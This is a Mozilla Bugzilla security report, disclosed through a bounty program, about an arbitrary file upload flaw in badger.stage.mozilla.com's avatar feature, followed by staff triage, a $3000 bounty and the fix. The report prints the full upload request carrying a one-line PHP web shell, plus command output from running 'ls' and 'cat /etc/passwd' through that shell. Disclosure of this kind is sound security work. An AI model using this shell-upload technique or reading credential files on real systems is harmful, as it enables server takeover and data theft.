Closed Bug 661344 Opened 14 years ago Closed 14 years ago

Arbitrary file uploading vulnerability in badger.stage.mozilla.com

Categories

(Websites :: Other, defect)

Product:
Websites
Component:
Other
Type:
defect
Priority:
Not set
Severity:
blocker

Tracking

(Not tracked)

Status:
VERIFIED FIXED

People

(Reporter: luca.defulgentis, Unassigned)

References

(
URL
)

Details

(Keywords: reporter-external, Whiteboard: [infrasec:osinject][ws:critical])

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Build Identifier: Hello Mozilla, I found a critical vulnerability in badger.stage.mozilla.com's avatar image upload functionality. I was able to upload a php shell and execute commands on remote server. The following is an http request resulting in a web shell uploading: POST /avatar/change/ HTTP/1.1 Host: badger.stage.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://badger.stage.mozilla.com/avatar/change/ Cookie: csrftoken=c0660b8a28bcb9cb1d81cb8c39f0c7ff; sessionid=9b456284ccc6788d116b0655c6314d49 Content-Type: multipart/form-data; boundary=---------------------------8752007212818 Content-Length: 369 -----------------------------8752007212818 Content-Disposition: form-data; name="csrfmiddlewaretoken" c0660b8a28bcb9cb1d81cb8c39f0c7ff -----------------------------8752007212818 Content-Disposition: form-data; name="avatar"; filename="c.php" Content-Type: application/octet-stream <?php system($_GET['cmd']); ?> -----------------------------8752007212818-- Here is the output of execution of some commands via the remote shell: http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=ls%20-al%20/data/www/www.mozilla.org/ total 488 drwxr-xr-x 46 root root 4096 May 31 20:20 . drwxr-xr-x 115 root root 4096 Mar 1 20:05 .. -rw-r--r-- 1 root root 117388 Apr 19 19:50 .htaccess drwxr-xr-x 6 root root 4096 May 31 20:20 .svn -rw-r--r-- 1 root root 1245 Apr 19 19:50 403.html -rw-r--r-- 1 root root 2376 Apr 19 19:50 404.html -rw-r--r-- 1 root root 697 Apr 19 19:50 410.html -rw-r--r-- 1 root root 1120 Apr 19 19:50 500.html -rw-r--r-- 1 root root 413 Aug 11 2009 503.html drwxr-xr-x 5 root root 4096 May 4 06:52 MPL -rw-r--r-- 1 root root 1695 May 10 21:20 README drwxr-xr-x 7 root root 4096 Apr 14 15:10 about drwxr-xr-x 13 root root 4096 Feb 10 17:10 access drwxr-xr-x 3 root root 4096 Aug 25 2009 book drwxr-xr-x 4 root root 4096 Aug 21 2009 cache drwxr-xr-x 5 root root 4096 Feb 10 17:10 causes drwxr-xr-x 4 root root 4096 Feb 18 22:20 community drwxr-xr-x 3 root root 4096 Dec 8 13:11 contact drwxr-xr-x 7 root root 4096 May 27 13:30 contribute drwxr-xr-x 3 root root 4096 Feb 10 17:10 credits lrwxrwxrwx 1 root root 5 Aug 25 2009 css -> style drwxr-xr-x 3 root root 4096 Feb 18 22:20 developer drwxr-xr-x 9 root root 4096 Aug 26 2009 directory drwxr-xr-x 8 root root 4096 Dec 8 13:10 docs drwxr-xr-x 6 root root 4096 Feb 1 09:10 drumbeat drwxr-xr-x 8 root root 4096 Dec 8 13:11 editor -rw-r--r-- 1 root root 1406 Jul 29 2009 favicon.ico drwxr-xr-x 3 root root 4096 Feb 18 22:20 firefox drwxr-xr-x 11 root root 4096 Feb 24 12:10 foundation drwxr-xr-x 12 root root 4096 Dec 8 13:10 grants drwxr-xr-x 7 root root 4096 Feb 10 17:10 hacking drwxr-xr-x 12 root root 12288 Mar 23 15:01 images drwxr-xr-x 6 root root 4096 May 11 13:10 includes -rw-r--r-- 1 root root 21581 Feb 10 17:10 index.de.html -rw-r--r-- 1 root root 21463 Feb 10 17:10 index.fr.html -rw-r--r-- 1 root root 21197 Feb 10 17:10 index.hr.html -rw-r--r-- 1 root root 20988 Apr 14 15:20 index.html -rw-r--r-- 1 root root 17234 May 31 20:20 index.pt-BR.html -rw-r--r-- 1 root root 21475 Feb 10 17:10 index.sq.html drwxr-xr-x 6 root root 4096 May 30 08:30 join drwxr-xr-x 12 root root 4096 Dec 8 13:11 js drwxr-xr-x 4 root root 4096 Jul 29 2009 keymaster drwxr-xr-x 4 root root 4096 Jul 29 2009 legal drwxr-xr-x 11 root root 4096 Dec 8 13:10 newlayout drwxr-xr-x 6 root root 4096 Feb 10 17:10 parks drwxr-xr-x 10 root root 4096 Aug 25 2009 performance drwxr-xr-x 5 root root 4096 May 18 12:01 phonebook drwxr-xr-x 8 root root 4096 Aug 11 2009 ports drwxr-xr-x 3 root root 4096 Feb 10 17:10 privacy drwxr-xr-x 37 root root 4096 Feb 18 22:20 projects drwxr-xr-x 4 root root 4096 Dec 8 13:11 rdf -rw-r--r-- 1 root root 1138 Oct 21 2009 refresh-press-center-feed.php drwxr-xr-x 4 root root 4096 Feb 10 17:10 rhino drwxr-xr-x 4 root root 4096 Dec 8 13:11 script drwxr-xr-x 4 root root 4096 Aug 31 2009 scriptable drwxr-xr-x 5 root root 4096 Feb 10 17:10 security drwxr-xr-x 3 root root 4096 Dec 8 13:11 start drwxr-xr-x 7 root root 4096 May 31 20:20 style drwxr-xr-x 3 root root 4096 Dec 8 13:11 support drwxr-xr-x 4 root root 4096 Dec 4 2009 test-l10n drwxr-xr-x 5 root root 4096 Jul 29 2009 themes drwxr-xr-x 4 root root 4096 Dec 8 13:10 unix http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=cat%20/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin nagios:x:100:101:nagios:/var/log/nagios:/bin/sh apache:x:48:48:Apache:/var/www:/bin/bash avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin splunk:x:500:500:Splunk Server:/opt/splunk:/bin/false hpsmh:x:101:501::/opt/hp/hpsmh:/sbin/nologin ganglia:x:102:102:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin avahi-autoipd:x:103:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin memcached:x:104:104:Memcached daemon:/var/run/memcached:/sbin/nologin processor:x:501:502::/home/processor:/bin/bash lars:x:502:503::/home/lars:/bin/bash rabbitmq:x:105:105:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin Thanks, Luca. Reproducible: Always
Whiteboard: [ws:critical]
Thanks for the report Luca. We're looking into the issue now.
Severity: normal → blocker
Status: UNCONFIRMED → NEW
Ever confirmed: true
OS: Windows 7 → All
Hardware: x86 → All
Whiteboard: [ws:critical] → [infrasec:osinject][ws:critical]
Bug# 661356 has been filed to disable the staging environment while we work on a fix. Thanks again for the report.
This bug qualifies for the full $3000 web bounty. Thanks!
badger.stage.mozilla.com is now offline per bug 661356. Closing this issue.
Status: NEW → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Note: A root cause investigation for this issue is in progress and captured in bug 662805
This issue has been resolved, however bug 662805 contains some ongoing discussion of this and related issues.
Status: RESOLVED → VERIFIED
Group: websites-security
Flags: sec-bounty+
You need to log in before you can comment on or make changes to this bug.